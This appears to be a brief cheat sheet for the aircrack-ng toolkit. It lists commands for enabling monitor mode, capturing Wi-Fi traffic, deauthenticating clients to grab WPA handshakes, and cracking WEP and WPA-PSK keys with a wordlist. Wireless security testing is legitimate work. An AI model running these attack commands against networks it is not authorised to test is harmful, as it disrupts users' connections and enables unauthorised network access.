https://github.com/aircrack-ng/aircrack-ng
Monitor Mode
airmon-ng check killKill processes that interfere with monitor mode.
airmon-ng start wlan0Start monitor mode on wlan0 interface.
Capture
airodump-ng wlan0monListen for APs around.
airodump-ng wlan0mon -w scanIdentify target BSSID and Channel.
airodump-ng wlan0mon -w capture --bssid AP:MAC --channel 6Capture traffic from an AP. Need to wait for WPA handshake in the top right.Can use Deauth Attack to speed up the process.
Deauth Attack
aireplay-ng wlan0mon -0 1 -a AP:MAC -c CLIENT:MACDeauth attack (kick the client off the AP really quick).
-0 1Deauth, one time.
-cClient to deauthenticate.
Crack WEP, WPA-PSK
aircrack-ng -a WEP myCapture.capaircrack-ng -w wordlist.txt -b AP:MAC myCaptureFromAirodump
-a WEPAttack Mode: WEP (Need > 5000 IV) or WPA-PSK.
-e mySSIDSpecifies SSID.
-n 64Size of the key (64, 128, 152, 256, 512).